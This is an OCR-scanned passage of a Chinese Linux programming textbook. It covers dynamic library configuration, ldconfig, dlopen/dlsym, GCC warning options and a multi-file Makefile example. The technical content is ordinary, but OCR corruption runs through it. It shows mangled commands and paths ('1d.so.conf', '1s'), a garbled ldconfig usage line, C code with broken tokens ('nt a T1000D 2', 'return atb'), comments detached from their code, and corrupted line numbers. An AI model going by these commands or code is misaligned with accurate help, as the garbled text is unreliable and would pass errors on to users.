2. 动态 链接 库 的 配置 


动态 链接 库 不 能 随意 使 用 ， 要 在 运行 的 程序 中 使 用 动态 链接 库 ， 需 要 指定 系统 的 动态 
链接 库 搜 索 的 路 径 ， 让 系统 找到 运行 所 需 的 动态 链接 库 才 可 以 。 系 统 中 的 配置 文件 
/etc/ld.so.conf 是 动态 链接 库 的 搜索 路 径 配 置 文件 。 在 这 个 文件 内 ， 存 放 着 可 被 Linux 共享 
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的 动态 链接 库 所 在 目录 的 名 字 (系统 目录 /lib、/usr/lib 除外 ), 多 个 目录 名 间 以 空白 字符 ( 空 


格 、 


换行 等 ) 或 冒号 或 逗号 分 隔 。 查 看 系统 中 的 动态 链接 库 配 置 文件 的 内 容 : 


$ cat /etc/1d.so.conf 
include /etc/ld.so.conf.d/*.conf 


Ubuntu 的 配置 文件 将 上 日 录 /etc/ld.so.conf.d 中 的 配置 文件 包含 进来 ， 对 这 个 日 录 下 的 文 


件 进行 查看 : 


$ 1s /etc/ld.so.conf.d/ 
i386-linux-gnu GL.conf libc.conf 
i686-linux-gnu.conf vmware-tools-libraries.conf 
$ cat /etc/ld.so.conf.d/i686-linux-gnu.conf 
# 查 看 配置 文件 1486-1inux-gnu.conf 
# Multiarch support 
/lib/i386-linux-gnu 
/usr/lib/i386-1inux-gnu 
/lib/i686-linux-gnu 
/usr/1ib/i686-linux-gnu 


从 上 面 的 配置 文件 可 以 看 出 ， 在 系统 的 动态 链接 库 配 置 中 ， 包 含 了 该 动态 库 


/lib/i386-linux-gnu、 /usr/lib/i386-linux-gnu 和 /lib/i686-linux-gnu、/usr/lib/i686-linux-gnu 四 个 
目录 。 


3. 动态 链接 库 管理 命令 
为 了 让 新 增加 的 动态 链接 库 能 够 被 系统 共享 ， 需 要 运行 动态 链接 库 的 管理 命令 


ldconfig。ldconfig 命令 的 作用 是 在 系统 的 默认 搜索 路 径 ， 和 动态 链接 库 配 置 文件 中 所 列 出 


的 目 


录 里 搜索 动态 链接 库 ， 创 建 动态 链接 装 入 程序 需要 的 链接 和 缓存 文件 。 搜 索 完 毕 后 ， 


将 结果 写 入 缓存 文件 /etclld.so.cache 中 ， 文 件 中 保存 的 是 已 经 排 好 序 的 动态 链接 库 名 字 列 


表 。 


ldconfig 命令 行 的 用 法 如 下 ， 其 中 选项 的 含义 参见 表 2.4。 
Laconftigli=vI==verzboselI=nluI=N (=X) (=£ CONEII [=C CACHE] [=r ROOTI I=1] 


[-pl--print-cache] [-c FORMAT] [--format=FORMAT] [-V] [-?|--help|--usage] 
path... 


表 2.4 ldconfig 的 选项 含义 


选 项 含义 
-Vv 此 选项 打印 ldconfig 的 当前 版 本 号 ， 显 示 所 扫描 的 每 一 个 目录 和 动态 链接 库 
本 比 选项 处 理 命令 行 指定 的 目 录 ， 不 对 系统 的 默认 目录 /lib、/usr/lib 进行 扫描 ， 也 不 
对 配置 文件 /etc/ld.so.conf 中 所 指定 的 目录 进行 扫描 
-N 比 选 项 ldconfig 不 会 重建 缓存 文件 
-Xx 比 选项 ldconfig 不 更 新 链接 
-f CONF 此 选项 使 用 用 户 指定 的 配置 文件 代替 默认 文件 /etc/ld.so.conf 
-C CACHE 此 选项 使 用 用 户 指定 的 缓存 文件 代替 系统 默认 的 缓存 文件 /etwld.so.cache 
- ROOT 比 选项 改变 当前 应 用 程序 的 根 目 录 
-1 比 选项 用 于 手动 链接 单个 动态 链接 库 
-p 或 --print-cache | 此 选项 用 于 打印 出 缓存 文件 中 共享 库 的 名 字 


第 1 篇 Linux 网 络 开发 基础 


如 果 想 知道 系统 中 有 哪些 动态 链接 库 ， 可 以 使 用 ldconfig 的 -p 选项 来 列 出 缓存 文件 中 
的 动态 链接 库 列表 。 下 面 的 命令 中 表明 在 系统 缓存 中 共有 682 个 动态 链接 库 。 


$ ldconfig -p ( 列 出 当前 系统 中 的 动态 链接 库 ) 
在 缓冲 区 "/etc/1d.so.cache" 中 找到 809 个 库 (缓存 中 的 动态 链接 库 的 数目 ) 
libzephyr.so.4 (libc6) => /usr/lib/libzephyr.so.4 
libzeitgeist-1.0.so.1 (libc6) => /usr/lib/libzeitgeist-1.0.so.1 
libz.so.1 (libc6) => /lib/i386-linux-gnu/libz.so.1 
libyelp.so.0 (libc6) => /usr/lib/libyelp.so.0 
libyajl.so.1 (libc6) => /usr/lib/i386-linux-gnu/libyajl.so.1 


使 用 ldconfig 命令 ， 默 认 情况 下 并 不 将 扫描 的 结果 输出 。 使 用 -v 选项 会 将 ldconfig 在 
运行 过 程 中 扫描 到 的 目录 和 共享 库 信息 输出 到 终端 ， 用 户 可 以 看 到 运行 的 结果 和 中 间 的 信 
息 。 在 执行 ldconfig 后 ， 将 刷新 缓存 文件 /etc/ld.so.cache。 


$ ldconfig -v 


/usr/lib: (扫描 /usr/1ib 目录 中 的 动态 链接 库 ) 
libdb-4.3.so -> libdb-4.3.so 
libXcursor.so.1 -> libXcursor.so.1.0.2 


/usr/lib/i686: (hwcap: 0x2000000000000) (扫描 /usr/1ib/i486 目录 中 的 动态 
链接 库 ) 
libss1.30.0.9.8 -> libssl.30.0.9.8 
libcrypto.so.0.9.8 -> libcrypto.so.0.9.8 


当 用 户 的 目录 并 不 在 系统 动态 链接 库 配 置 文件 /etc/1d.so.conf 中 指定 的 时 候 ， 可 以 使 用 
ldconfig 命令 显示 指定 要 扫描 的 目录 ， 将 用 户 指定 目录 中 的 动态 链接 库 放 入 系统 中 进行 共 
享 。 命 令 格式 的 形式 为 : 

ldconfig 目录 名 

这 个 命令 将 ldconfig 指定 的 目录 名 中 的 动态 链接 库 放 入 系统 的 缓存 /etc/ld.so.cache 中 ， 
从 而 可 以 被 系统 共享 使 用 。 下 面 的 代码 将 扫描 当前 用 户 的 lib 目录 ， 将 其 中 的 动态 链接 库 
加 入 系统 : 


$ ldconfig ~/lib 


全 注意 :如果 在 运行 上 述 命令 后 ， 再 次 运行 ldconfig 而 没有 加 参数 ， 系 统 会 将 /lib、/usr/lib 
及 /etc/ld.so.conf 中 指定 目录 中 的 动态 库 加 入 缓存 , 这 时 候 上 述 代码 中 的 动态 链接 
库 可 能 不 被 系统 共享 了 。 


4. 使 用 动态 链接 库 


在 编译 程序 时 ， 使 用 动态 链接 库 和 静态 链接 库 是 一 致 的 ， 使 用 “-l 库 名 ”的 方式 ， 在 
生成 可 执行 文件 的 时 候 会 链接 库 文件 。 例如 下 面 的 命令 将 源 文件 main.c 编译 成 可 执行 文件 
test， 并 链接 库 文 件 libstr.a 或 者 libstr.so: 


$gcc -o test main.c -L./ -lstr 


-L 指定 链接 动态 链接 库 的 路 径 ，-lstr 链接 库 函 数 str。 但 是 运行 test 一 般 会 出 现 如 下 
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问题 : 


./test: error while loading shared libraries: libstr.so: cannot open shared 
object file: No such file or directory 


这 是 由 于 程序 运行 时 没有 找到 动态 链接 库 造 成 的 。 程 序 编译 时 链接 动态 链接 库 和 运行 
时 使 用 动态 链接 库 的 概念 是 不 同 的 ， 在 运行 时 ， 程 序 链接 的 动态 链接 库 需 要 在 系统 目录 下 
才 行 。 有 以 下 几 种 办 法 可 以 解决 此 问题 。 

口 将 动态 链接 库 的 目录 放 到 程序 搜索 路 径 中 ， 可 以 将 库 的 路 径 加 到 环境 变量 

LD_LIBRARY PATH 中 实现 ， 例 如 : 

$export LD LIBRARY PATH=/example/ex02: $LD LIBRARY PATH 

将 存放 库 文件 libstrso 的 路 径 /example/ex02 加 入 到 搜索 路 径 中 ， 再 运行 程序 就 没有 之 
前 的 警告 了 。 

口 另 一 种 方法 是 使 用 1d-Linux.so.2 来 加 载 程序 ， 命 令 格式 为 : 

/lib/1d-Linux.so.2 --library-path 路 径 程序 名 

加 载 test 程序 的 命令 为 : 


/lib/ld-Linux.so.2 --library-path /example/ex02 test 


全 注意 ; 如 果 系 统 的 搜索 路 径 下 同时 存在 静态 链接 库 和 动态 链接 库 ， 默认 情况 下 会 链接 动 
态 链接 库 。 如 果 需 要 强制 链接 静态 链接 库 ， 需 要 加 上 “-static” 选 项 ， 即 上 述 的 
编译 方法 改 为 如 下 的 方式 : 


$gcc -oO test main.c -static -lstr 


2.2.10 动态 加 载 库 


动态 加 载 库 和 一 般 的 动态 链接 库 所 不 同 的 是 ， 一 般 动态 链接 库 在 程序 启动 的 时 候 就 要 
寻找 动态 库 ， 找 到 库 函 数 ， 而 动态 加 载 库 可 以 用 程序 的 方法 来 控制 什么 时 候 加 载 。 动 态 加 
载 库 主要 有 函数 dlopen()、dlerror()、dlsym() 和 dlclose()。 

1. 打开 动态 库 dlopen() 函 数 

函数 dlopen() 按 照 用 户 指 定 的 方式 打开 动态 链接 库 ， 其 中 参数 flename 为 动态 链接 库 
的 文件 名 ，flag 为 打开 方式 ， 一般 为 RTLD LASY， 函 数 的 返回 值 为 库 的 指针 。 其 函数 原 
型 如 下 : 

void * dlopen(const char *filename, int flag) 7 

例如 ， 下 面 的 代码 使 用 dlopen 打开 当前 目录 下 的 动态 库 libstr.so。 


void *phandle = dlopen("./libstr.so", RTLD LAZY); 


2. 获得 函数 指针 dlsym() 
使 用 动态 链接 库 的 目的 是 调用 其 中 的 函数 ,完成 特定 的 功能 。 函数 dlsym0 可 以 获得 动 
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态 链接 库 中 指定 函数 的 指针 ， 然 后 可 以 使 用 这 个 函数 指针 进行 操作 。 函 数 dlsym() 的 原型 


如 下 : 


void * dlsym(void *handle, char *symbol); 


其 中 参数 handle 为 dlopen() 打 开动 态 库 后 返回 的 句柄 ,参数 symbol 为 函数 的 名 称 ， 返 


回 值 为 函数 指针 。 
3. 使 用 动态 加 载 库 的 一 个 例子 


下 面 是 一 个 动态 加 载 库 使 用 的 例子 。 首 先 使 用 函数 dlopen() 来 打开 动态 链接 库 ， 判 断 
是 否 正常 打开 ， 可 以 使 用 函数 dlerror() 判 断 错误 。 如 果 上 面 的 过 程 正常 ， 使 用 函数 dlsymO) 
来 获得 动态 链接 库 中 的 某 个 函数 ， 可 以 使 用 这 个 函数 来 完成 某 些 功 能 。 其 代码 如 下 : 


01 /+ 动态 加 载 库 示例 */ 

02 #include <dlfcn.h>/* 动 态 加 载 库 库 头 */ 

03 int main(void) 

04 { 

05 char src[]="Hello Dymatic"; 

06 int (*pStrLenFun) (char *str); 

07 void *phandle = NULL; 

08 char *perr = NULL; 

09 phandle = dlopen("./libstr.so", RTLD LAZY); 


10 。 /#* 判 断 是 否 正 确 打开 */ 
11 if(!phandle) 


了 2 { 
二 printf ("Failed Load library!\n"); 
14 } 


15 perr = dlerror(); 
16 if(perr != NULL) 


1 { 

18 printf("%s\n",perr); 
19 return 0; 

20 } 

21 


区 pStrLenFun = dlsym(phandle, 
人 23 perr = dlerror(); 


"StrLen"); 


24 if(perr != NULL) 

25 下 

26 printf("%s\n",perr); 

2 return 0; /* 返 回 #/ 
28 

29 


30 printf ("the string length is: 


/* 要 计算 的 字符 串 */ 

/* 函 数 指针 */ 

/* 库 句柄 */ 

/* 错 误 信 息 指针 */ 

/* 打 开 libstr.so 动态 链 
接 库 */ 


/* 打 开 错 误 */ 

/* 打 印 库 不 能 加 载 信息 */ 
/* 读 取 错 误 值 */ 

/* 存 在 错误 */ 

/* 正 常 返 回 */ 


/* 获 得 函数 StrLen 的 地 址 */ 
/* 读 取 错 误 信 息 */ 
/* 存 在 错误 */ 


/* 打 印 错误 函数 获得 的 错误 信息 */ 


sd\n",pStrLenFun (src)); 


/* 调 用 函数 pstrLenFunc 计算 字符 串 的 长 度 */ 


31 dlclose (phandle); /* 关 闭 动态 加 载 库 */ 
3 return 0; 
S200 


编译 上 述 文件 的 时 候 需要 链接 动态 库 libdl.so, 使 用 如 下 的 命令 将 上 述 代码 编译 成 可 执 


行文 件 testdl。 命 令 


$gcc -o testdl main.c libstr.so -ldl 
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执行 文件 testdl 的 结果 为 : 


$./testdl 
string length is:13 


使 用 动态 加 载 库 和 动态 链接 库 的 结果 是 一 致 的 。 
2.2.11 GCC 常用 选项 


除了 之 前 介绍 的 基本 功能 外 ，GCC 的 选项 配置 是 编译 时 很 重要 的 选择 , 例如 头 文件 路 
径 、 加 载 库 路 径 、 和 警告 信息 及 调试 等 。 本 节 将 对 常用 的 选项 进行 介绍 。 


1. -DMACRO 选项 


定义 一 个 宏 ， 在 多 种 预定 义 的 程序 中 会 经 常 使 用 。 如 下 代码 根据 系统 是 否定 义 Linux 
宏 来 执行 不 同 的 代码 。 使 用 -D 选项 可 以 选择 不 同 的 代码 段 , 例如 -DOS_LINUX 选项 将 执行 
代码 段 D。 

#ifdef OS LINUX 

.代码 段 @ 


#else 


. . .代码 段 @ 
#endif 


口 -Idir: 将 头 文件 的 搜索 路 径 扩 大 ， 包 含 dir 目录 。 
口 -Ldir: 将 链接 时 使 用 的 链接 库 搜索 路 径 扩 大 ， 包 含 dir 目录 。sgce 都 会 优先 使 用 共 


享 程序 库 。 
口 -static 仅 选用 静态 程序 库 进行 链接 ， 如 果 一 个 目录 中 静态 库 和 动态 库 都 存在 ， 则 
仅 选 用 静态 库 。 


口 -g: 包括 调试 信息 。 

口 -On: 优化 程序 ， 程 序 优化 后 执行 速度 会 更 快 ， 程 序 的 占用 空间 会 更 小 。 通 常 gce 
会 进行 很 小 的 优化 ， 优 化 的 级 别 可 以 选择 ， 即 n。 最 常用 的 优化 级 别 是 2。 

口 -Wall: 打开 所 有 gcc 能 够 提供 的 、 常 用 的 警告 信息 。 


2. GCC 的 常用 选项 及 含义 
表 2.5 中 是 GCC 的 常用 选项 和 含义 , 主要 列 出 了 警告 选项 、 代 码 检查 、ANSI 兼容 等 。 
可 以 在 编译 程序 的 时 候 对 GCC 的 选项 进行 设置 ， 编 写 质 量 高 的 代码 。 
表 2.5 常用 的 编译 选项 及 含义 
含义 


这 个 选项 针对 数组 的 下 标 值 ， 如 果 下 标 值 是 char 类 型 的 则 给 出 警告 。 
因为 在 一 些 平台 上 ，char 类 型 的 变量 可 能 定义 为 signed char， 是 一 个 


GCC 的 警告 选项 


-Wchar-subscripts 


-Wall 符号 类 型 的 整数 ， 所 以 char 类 型 的 变量 做 下 标 时 ， 当 下 标的 值 为 负数 
选项 时 可 能 造成 内 存 溢出 


合 这 个 选项 针对 代码 中 的 注释 ， 如 果 出 现 不 合适 的 注释 格式 的 时 候 会 出 
-Wcomment 现 警 告 。 例 如 在 “/#* … */” 中 间 出 现 “/*”， 或 者 在 “//...” 类 型 的 注 
释 末 尾 出 现 符 号 “\” 的 时 候 ，GCC 给 出 警告 
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续 表 
含义 


-Wall 
选项 
合 


-Wformat 


这 个 选项 针对 输入 输出 的 格式 ， 检 查 printf 和 scanf 等 格式 化 输入 输出 
函数 的 格式 字符 串 与 参数 类 型 的 匹配 情况 , 如 果 发 现 不 匹配 则 发 出 警告 


-Wimplicit 


-Wmissing-braces 


这 个 选项 针对 函数 的 声明 ， 这 个 选项 是 选项 -Wimplicit-int 和 选项 
-Wimplicit-function-declaration 两 个 选项 的 集合 

第 一 个 选项 在 声明 函数 时 如 果 没 有 指定 返回 值 会 给 出 警告 ;第 二 个 参 
数 如 果 在 声明 前 调用 函数 会 给 出 警告 

这 个 选项 针对 结构 类 型 或 者 数组 初始 化 时 的 不 合适 格式 。 例 如 ， 

int array[2][2]={0,0,1,1}; 

由 于 初始 化 的 表达 式 没有 充分 用 引 括 起 来 , GCC 会 给 出 警告 , 应 该 采 
用 下 面 的 定义 方法 : 

int array[2][2]={{0,0},{1,1}}; 


-Wparentheses 


-Wsequence-point 


-Wswitch 


-Wunused 


-Wunused-parameter 


这 个 选项 针对 多 种 优先 级 的 操作 符 在 一 起 或 者 代码 结构 难以 看 明白 
的 操作 ， 如 果 没 有 将 操作 进行 明晰 地 分 离 ，GCC 会 给 出 警告 。 例 如 ， 
这 (a&&bllc) 中 的 3 个 变量 a、b 和 c 的 操作 顺序 应 该 用 括号 分 离 

这 个 选项 针对 顺序 点 ， 如 果 在 代码 中 使 用 了 有 可 能 造成 顺序 点 变化 的 
语句 ，GCC 会 给 出 和 警告。 例如， 代码 二 i++ 在 不 同 的 平台 上 i 值 的 结 
果 是 不 同 的 ， 如 果 使 用 了 这 样 的 代码 ，GCC 会 给 出 警告 

这 个 选项 针对 switch 语句 ， 如果 一 个 switch 语句 中 没有 default 条 件 ， 
GCC 会 给 出 警告 信息 

这 个 选项 针对 代码 中 没有 用 到 的 变量 、 函 数 、 值 、 转 跳 点 等 ， 它 是 
-Wunused-function、 -Wunused-label、-Wunused-variable、-Wunused-value 
选项 的 集合 。 

-Wunused-function 选项 警告 代码 中 存在 没有 使 用 的 静态 函数 ， 或 者 只 
定义 却 没有 实现 的 静态 函数 ; 

-Wunused-label 选项 警告 代码 中 存在 定义 了 却 没有 使 用 ， 或 者 使 用 了 
却 没有 定义 的 标签 ; 

-Wunused-variable 选项 警告 代码 中 存在 定义 了 却 没 有 使 用 的 局 部 变量 ; 
-Wunused-value 选项 警告 代码 中 计算 表达 式 的 结果 没有 使 用 

这 个 选项 针对 函数 参数 ， 如 果 一 个 函数 的 参数 在 函数 实现 中 没有 用 
到 ，GCC 会 给 出 警告 信息 


-Wuninitialized 


这 个 选项 针对 没有 初始 化 变量 的 使 用 ,如 果 一 个 局 部 变量 在 使 用 之 前 
没有 初始 化 ，GCC 会 给 出 警告 信息 


非 -Wall 
警告 
选项 


-Wflot-equal 


-Wshadow 


这 个 选项 针对 浮 点 值 相等 的 判定 ， 由 于 浮 点 值 的 确切 值 难以 得 知 ， 所 
以 如 果 浮 点 值 出 现在 相等 判定 的 表达 式 中 , GCC 会 给 出 警告 。 浮 点 值 
的 相等 判定 可 以 用 浮 点 值 的 差 与 某 个 小 值 比较 判定 是 否 相 等 
这 个 选项 用 于 局 部 变量 作用 域内 的 同名 变量 ， 如 果 局 部 变量 的 作用 域 
范围 内 有 其 他 同名 变量 时 ， 局 部 变量 会 遮蔽 全 局 变量 ， 这 时 GCC 会 
给 出 警告 信息 


-Wbad-function-cast 


这 个 选项 针对 函数 的 返回 值 ， 当 函数 的 返回 值 赋 给 不 匹配 的 类 型 时 ， 
GCC 会 给 出 警告 信息 


-Wsign-compare 


这 个 选项 针对 有 符号 数 和 无 符号 数 的 比较 ， 由 于 无 符号 数 的 优先 级 比 
有 符号 数 的 优先 级 高 ， 二 者 进行 比较 运算 的 时 候 ， 会 先 将 有 符号 数 转 
换 为 无 符号 数 。 在 负 的 有 符号 数 和 无 符号 数 进行 比较 的 时 候 ， 容 易 出 
现 错误 
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GCC 的 警告 选项 含义 
这 个 选项 针对 结构 类 型 的 函数 返回 值 ， 如 果 函 数 的 返回 值 为 结构 、 
-Waggregate-retum | 联合 等 类 型 时 ，GCC 会 给 出 警告 信息 
非 -Wall - 
es 这 个 选项 针对 字符 类 型 变量 的 错误 赋值 ， 当 使 用 类 似 char c='test 这 
样 的 代码 时 ，GCC 会 给 出 警告 
沈 项 给 出 蜀 
~ 这 个 选项 针对 元 余 代码 ， 如 果 代 码 中 有 不 能 到 达 的 代码 时 ，GCC 会 
-Wunreachable-code 给 出 警告 信息 
其 他 -Witraditional 选项 traditional 试图 支持 传统 C 编译 器 的 某 些 方面 
-ansi 与 ansi 的 C 语言 兼容 
-pedantic 允许 发 出 ANSIISO C 标准 所 列 出 的 所 有 警告 
-pedantic-errors 允许 发 出 ANSIISO C 标准 所 列 出 的 所 有 错误 
编译 检查 | -fsyntax-only 仅 进 行 编译 检查 而 不 实际 编译 程序 


全 注意 : 在 编写 代码 的 时 候 ， 不 好 的 习惯 会 造成 程序 执行 过 程 中 发 生 错 误 。 在 一 个 比较 大 
的 项 目 中 ， 当 程序 运行 起 来 后 再 查找 这 些 错误 是 很 困难 的 。 因 此 一 种 好 的 习惯 是 
使 用 编译 选项 将 代码 的 警告 信息 显示 出 来 ， 并 对 代码 进行 改正 。 例 如 ， 打 开 编 译 
选项 -Wall 和 -W 来 显示 所 有 的 警告 信息 ， 甚 至 更 严格 一 些 ， 打 开 -Werror 将 编译 
时 的 警告 信息 作为 错误 信息 来 处 理 ， 中 断 编 译 。 


2.2.12 ”编译 环境 的 搭建 


目前 最 新 的 GCC 编译 器 的 版 本 为 gcc-4.8.0。 在 安装 Ubuntu 的 时 候 ， 默 认 情况 下 会 安 
装 GCC。 读 者 可 以 使 用 which 命令 来 查看 系统 中 是 否 已 经 安装 了 GCC: 

$which gcc 

如 果 不 存在 ， 使 用 apt 进行 升级 ， 获 得 gcc 包 并 且 安 装 : 

$apt-get install gcc 


如 果 读 者 对 C++ 感 兴趣 可 以 安装 g++。 在 编译 器 安装 完毕 后 , 可 以 使 用 GCC 进行 程序 
的 编译 。 


2.3” ”Makefile 文件 简介 


使 用 GCC 的 命令 行进 行程 序 编译 在 单个 文件 下 是 比较 方便 的 ， 当 工程 中 的 文件 逐渐 增 
多 ， 甚 至 变 得 十 分 庞大 的 时 候 ， 使 用 GCC 命令 编译 就 会 变 得 力不从心 。Linux 中 的 make 工 
具 提 供 了 一 种 管理 工程 的 功能 ， 可 以 方便 地 进行 程序 的 编译 ， 对 更 新 的 文件 进行 重新 编译 。 
2.3.1 一 个 多 文件 的 工程 例子 


有 一 个 工程 中 的 文件 列表 如 图 2.2 所 示 。 工 程 中 共有 5 个 文件 ,在 add 目录 中 有 add_int'c 
和 add_float.c， 两 个 文件 分 别 计算 整 型 和 浮 点 型 的 相 加 ; 在 sub 目录 下 有 文件 sub_int.c 和 


。33。 


第 1 篇 Linux 网 络 开发 基础 
sub_float.c， 分 别 计算 整 型 和 浮 点 型 的 相 减 ; 顶层 目录 有 main.c 文件 负责 整个 程序 。 


当前 目录 


main.c 


add 目 录 


add_int.c 


add floatc 
sub 目 录 


sub_int.c 


sub float.c 


图 2.2 文件 目录 结构 


工程 中 的 代码 分 别 存 放 在 add/add_int.c、add/add float.c、add/add.h、sub/sub_int.c、 
sub/sub_float.c、sub/sub.h 和 main.c 中 。 


1. 文件 main.c 


文件 main.c 的 代码 如 下 。 在 main0 函 数 中 调用 整数 、 浮 点 的 加 减 运算 函数 进行 数值 
计算 。 


01 /* main.c */ 

02 #include <stdio.h> 
03 ”/* 需 要 包含 的 头 文件 */ 
04 #include "add.h" 
05 #include "sub.h" 
06 int main(void) 


On 
08 /* 声 明 计 算 所 用 的 变量 *a、b 为 整 型 , x、y 为 浮 点 型 */ 

09 nt a T1000D 2 

10 float x= 1.23456,y = 9.87654321; 

i 

12 /* 调 用 函数 并 将 计算 结果 打印 出 来 */ 

13 printf (vint atb IS:%d\n",add int(a,b)); /* 计 算 整 型 加 */ 
14 printf ("int a-b IS:%d\n",sub int (a,b)); /* 计 算 整 型 减 */ 
15 printf ("float x+y IS:%f\n",add float (x,y)); /* 计 算 浮 点 型 加 */ 
16 printf ("float x-y IS:%f\n",sub float (x,y)); /* 计 算 浮 点 型 减 */ 
17 return 0; 

TL 

2. 加 操作 


文件 add.h 的 代码 如 下 ， 包 含 整数 和 浮 点 数 的 求 和 函数 声明 。 


01 /* add.h */ 

02 #ifndef _ADD H 

03 #define ADDH 

04 “/* 整 型 加 和 浮 点 型 加 的 声明 */ 

05 extern :int add _ int(int a, int b) 

06 extern float add float(float a, float b) 
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07 #endif /#* ADD 日 *#/ 


文件 add_float.c 的 代码 如 下 ， 函 数 add_float() 进 行 浮 点 型 数值 的 相 加 计算 。 


01 /*# add float.c */ 


02 /* 浮 点 数 求 和 函数 */ 

03 float add float(float a, float b) 
04 { 

05 return atb; 

06 } 


文件 add_int.c 的 代码 如 下 ， 函 数 add_int() 进 行 整数 型 数值 的 相 加 计算 。 


01 /* add int.c */ 
02 /* 整数 求 和 函数 */ 
03 int add int(int a int b) 


04 { 

05 return at+b; 
06 } 

3. 减 操作 


文件 sub.h 的 代码 如 下 ， 包 含 整数 和 浮 点 数 的 相 减 函数 声明 : 


01 /* sub.h */ 

02 #ifndef SUB H 

03 #define _ SUB H 

04 “/* 整 型 减 和 浮 点 型 减 的 声明 */ 

05 extern float sub float(float a, float b) 
06 extern int sub int(int a, int b); 

07 #endif /* SUB H */ 


文件 sub_int.c 的 代码 如 下 ， 函 数 sub_int() 进 行 整 型 的 相 减 计算 。 


01 /* sub int.c */ 

02 _/* 整数 相 减 函数 */ 

03 int sub int(int a, int b) 
04 { 

05 return a-b; 

06 } 


文件 sub_float.c 的 代码 如 下 ， 函 数 sub_float(0) 进 行 浮 点 型 的 相 减 计算 。 


01 /* sub float.c */ 

02 /* 浮 点 数 相 减 函数 */ 

03 float sub float(float a, float b) 
04 并 

05 return a-b; 

06 } 


2.3.2 多 文件 工程 的 编译 


将 2.3.1 节 中 的 多 文件 工程 编译 成 可 执行 文件 有 两 种 方法 ， 一 种 是 命令 行 操作 ， 手 动 
输入 将 源 文件 编译 为 可 执行 文件 ， 另 一 种 是 编写 Makefile 文件 ， 通 过 make 命令 将 多 个 文 
件 编 译 为 可 执行 文件 。 
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1. 命令 行 编译 程序 


要 将 此 文件 编译 为 可 执行 文件 cacu， 如 果 用 gcc 进行 手动 编译 ,是 比较 麻烦 的 。 例如， 
下 面 的 编译 方式 每 行 编译 一 个 C 文件 ， 生 成 目标 文件 ， 最 后 将 5 个 目标 文件 编译 成 可 执行 
文件 。 


$gcc -c add/add int.c -o add/add int.o (生成 add _ int.o 目标 函数 ) 

$gcc -c add/add float.c -o add/add float.o (生成 add float.o 目标 函数 ) 

$gcc -c sub/sub int.c -o sub/sub int.o (生成 sub_int.o 目标 函数 ) 

$gcc -c sub/sub float.c -o sub/sub float.o (生成 sub_float.o 目标 函数 ) 

$gcc -c main.c -o main.o (生成 main.o 目标 函数 ) 

$gcc -o cacu add/add int.o add/add float.o sub/sub int.o sub/sub float.o 
main.o《〔〈 链 接生 成 cacu) 


或 者 使 用 gce 的 默认 规则 ， 使 用 一 条 命令 直接 生成 可 执行 文件 cacu: 


$gcc -o cacu add/add int.c add/add float.c sub/sub int.c sub/ 
Sub_float.c main.c 


2. 多 文件 的 Makefile 


利用 上 面 一 条 命令 直接 产生 可 执行 文件 的 方法 ， 生 成 执行 文件 是 比较 容易 的 。 但 是 当 
频繁 修改 源 文件 或 者 当 项 目 中 的 文件 比较 多 、 关 系 比较 复杂 时 ， 用 gcc 直接 进行 编译 就 会 
变 得 十 分 困难 。 

使 用 make 进行 项 目 管理 , 需要 一 个 Makefile 文 件 ,make 在 进行 编译 的 时 候 , 从 Makefile 
文件 中 读 取 设 置 情况 ， 进 行 解析 后 运行 相关 的 规则 。make 程序 查找 当前 目录 下 的 文件 
Makefile 或 者 makefile， 按 照 其 规则 运行 。 例 如 ， 建 立 一 个 如 下 规则 的 Makefile 文件 。 

# 生 成 cacu, ": "右边 为 目标 


cacu:add int.o add float.o sub int.o sub float.o main.o 
gcc -o cacu add/add int.o add/add float.o \ (连接 符 ) 
sub/sub int.o sub/sub float.o main.o 
# 生 成 add_int.o 的 规则 ,将 add_int.c 编译 成 目标 文件 add_int.o 
add int.o:add/add int.c add/add.h 
gcc -c -o add/add int.o add/add int.c 
# 生 成 add_float.o 的 规则 
add float.o:add/add float.c add/add.h 
gcc -c -o add/add float.o add/add float.c 
# 生 成 sub_int.o 的 规则 
sub int.o:sub/sub int.c sub/sub.h 
gcc -c -o sub/sub int.o sub/sub int.c 
# 生 成 sub_float.o 的 规则 
sub float.o:sub/sub float.c sub/sub.h 
gcc -c -o sub/sub float.o sub/sub float.c 
# 生 成 main .o 的 规则 
main.o:main.c add/add.h sub/sub.h 
gcc -c -o main.o main.c -Iadd -Isub 


# 清 理 的 规则 
clean: 
rm -f cacu add/add int.o add/add float.o \ 
sub/sub int.o sub/sub float.o main.o 
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3. 多 文件 的 编译 
编译 多 文件 的 项 目 ， 在 上 面 Makefile 文件 编写 完毕 后 ， 运 行 make 命令 : 
$make 


gcc -c -o add/add int.o add/add int.c 

gcc -c -o add/add float.o add/add float.c 

gcc -c -o sub/sub int.o sub/sub int.c 

gcc -c -o sub/sub float.o sub/sub float.c 

gcc -c -o main.o main.c -Iadd -Isub 

gcc -o cacu add/add int.o add/add float.o \ 

sub/sub int.o sub/sub float.o main.o 

在 add 目录 下 生成 了 add int.o 和 add float.o 两 个 目标 文件 ， 在 sub 目录 下 生成 了 
sub_int.o 和 sub_float.o 两 个 文件 ， 在 主 目录 下 生成 了 main.o 目标 文件 ， 并 生成 了 cacu 最 
终 文件 。 

默认 情况 下 会 执行 Makefile 中 的 第 一 个 规则 ， 即 cacu 相关 的 规则 ， 而 cacu 规则 依赖 
于 多 个 日 标 文件 add_int.o、add_float.o、sub_int.o、sub_float.o、main.0。 编 译 器 会 先生 成 上 
述 目 标 文件 后 执行 下 述 命令 : 


$(CC) -o $ (TARGET) $ (OBJS) $ (CFLAGS) 


上 述 命令 将 多 个 目标 文件 编译 成 可 执行 文件 cacu， 即 : 


gcc -o cacu add/add int.o add/add float.o sub/sub int.o sub/sub float.o 
main.o -Iadd -Isub -02 


命令 make clean 会 调用 clean 相关 的 规则 ， 清 除 编译 出 来 的 目标 文件 ， 以 及 cacu。 
例如 : 


$make clean 
rm -f cacu add/add int.o add/add float.o \ 
sub/sub int.o sub/sub float.o main.o 


clean 规则 会 执行 “-$(RM)$(TARGET)$(OBJS)” 命 令 ， 将 定义 的 变量 扩展 后 为 : 


rm -f cacu add/add int.o add/add float.o sub/sub int.o sub/sub float.o main.o 


2.3.3 ”Makefile 的 规则 


Makefile 的 框架 是 由 规则 构成 的 .make 命令 执行 时 先 在 Makefile 文件 中 查找 各 种 规则 ， 
对 各 种 规则 进行 解析 后 运行 规则 。 规 则 的 基本 格式 为 : 


TARGET... : DEPENDEDS... 
COMMAND 


口 TARGET: 规则 所 定义 的 目标 。 通 常规 则 是 最 后 生成 的 可 执行 文件 的 文件 名 或 者 
